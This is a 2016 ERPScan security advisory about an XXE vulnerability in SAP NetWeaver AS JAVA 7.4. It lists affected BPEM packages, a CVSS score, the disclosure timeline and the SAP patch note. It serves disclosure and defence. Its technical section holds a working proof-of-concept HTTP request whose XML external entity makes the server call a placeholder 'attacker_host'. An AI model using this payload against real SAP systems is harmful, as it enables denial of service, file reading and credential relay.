
Date: Mon, 21 Nov 2016 11:48:05 +0300
From: ERPScan inc <erpscan.online@...il.com>
To: submissions@...ketstormsecurity.com, fulldisclosure@...lists.org,
  pen-test@...urityfocus.com, bugs@...uritytracker.com,
  bugtraq@...urityfocus.com
Subject: [ERPSCAN-16-034] SAP NetWeaver AS JAVA - XXE vulnerability in
 BC-BMT-BPM-DSK component

Application: SAP NetWeaver AS JAVA

Versions Affected: SAP NetWeaver AS JAVA 7.4

Vendor URL: http://SAP.com

Bug: XXE

Sent: 09.03.2016

Reported: 10.03.2016

Vendor response: 10.03.2016

Date of Public Advisory: 09.08.2016

Reference: SAP Security Note  2296909

Author: Vahagn Vardanyan (ERPScan)



Description


1. ADVISORY INFORMATION

Title:  [ERPSCAN-16-034] SAP NetWeaver AS JAVA – XXE vulnerability in
BC-BMT-BPM-DSK component

Advisory ID:[ERPSCAN-16-034]

Risk: high

Advisory URL: https://erpscan.com/advisories/erpscan-16-034-sap-netweaver-java-xxe-vulnerability-bc-bmt-bpm-dsk-component/

Date published: 11.11.2016

Vendors contacted: SAP


2. VULNERABILITY INFORMATION

Class: XXE

Impact: Denial of Service, Read File

Remotely Exploitable: yes

Locally Exploitable: no


CVSS Information

CVSS Base Score v3:    6.4 / 10

CVSS Base Vector:

AV : Attack Vector (Related exploit range) Network (N)

AC : Attack Complexity (Required attack complexity) High (H)

PR : Privileges Required (Level of privileges needed to exploit) Low (L)

UI : User Interaction (Required user participation) None (N)

S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Unchanged (U)

C : Impact to Confidentiality Low (L)

I : Impact to Integrity Low (L)

A : Impact to Availability High (H)



3. VULNERABILITY DESCRIPTION

1) It is possible, that an attacker can perform a DoS attack (for
example, an XML Entity expansion attack)

2) An SMB Relay attack is a type of man-in-the-middle attack where an
attacker asks a victim to authenticate to a machine controlled by the
attacker, then relays the credentials to the target. The attacker
forwards the authentication information both ways, giving him access.


4. VULNERABLE PACKAGES

BPEM PORTAL CONTENT 7.20

BPEM PORTAL CONTENT 7.30

BPEM PORTAL CONTENT 7.31

BPEM PORTAL CONTENT 7.40

BPEM PORTAL CONTENT 7.50



5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note  2296909



6. AUTHOR

 Vahagn Vardanyan (ERPScan)




7. TECHNICAL DESCRIPTION

PoC

```

POST /sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn HTTP/1.1

Content-Type: text/xml

User-Agent: ERPscan

Host: SAP_IP:SAP_PORT

Content-Length: 480

Connection: Keep-Alive

Cache-Control: no-cache

Authorization: Basic ZXJwc2NhbjplcnBzY2Fu


<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker_host">
]><SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">

   <SOAP-ENV:Body>

       <m:isBPMSInUse xmlns:m="http://api.facade.bpem.sap.com/"/>

   &xxe;</SOAP-ENV:Body>

</SOAP-ENV:Envelope>


```


8. REPORT TIMELINE

Sent:  09.03.2016

Reported: 10.03.2016

Vendor response: 10.03.2016

Date of Public Advisory: 09.08.2016



9. REFERENCES

https://erpscan.com/advisories/erpscan-16-034-sap-netweaver-java-xxe-vulnerability-bc-bmt-bpm-dsk-component/



10. ABOUT ERPScan Research

ERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It was acknowledged
multiple times by the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).

ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.

ERPScan experts participated as speakers, presenters, and trainers at
60+ prime international security conferences in 25+ countries across
the continents ( e.g. BlackHat, RSA, HITB) and conducted private
trainings for several Fortune 2000 companies.

ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP
security researches.

ERPScan experts were interviewed in specialized infosec resources and
featured in major media worldwide. Among them there are Reuters,
Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
Chinabyte, etc.

Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application to ICS/SCADA
systems), gathering their experience to conduct the best SAP security
research.

11. ABOUT ERPScan

ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally
and enables large Oil and Gas, Financial, Retail and other
organizations to secure their mission-critical processes. Named as an
‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP
Solution providers” and distinguished by 30+ other awards, ERPScan is
the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
assist in improving the security of their latest solutions.

ERPScan’s primary mission is to close the gap between technical and
business security, and provide solutions for CISO's to evaluate and
secure SAP and Oracle ERP systems and business-critical applications
from both cyberattacks and internal fraud. As a rule, our clients are
large enterprises, Fortune 2000 companies and MSPs, whose requirements
are to actively monitor and manage security of vast SAP and Oracle
landscapes on a global scale.

We ‘follow the sun’ and have two hubs, located in Palo Alto and
Amsterdam, to provide threat intelligence services, continuous support
and to operate local offices and partner network spanning 20+
countries around the globe.



Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301

Phone: 650.798.5255

Twitter: @erpscan

Scoop-it: Business Application Security
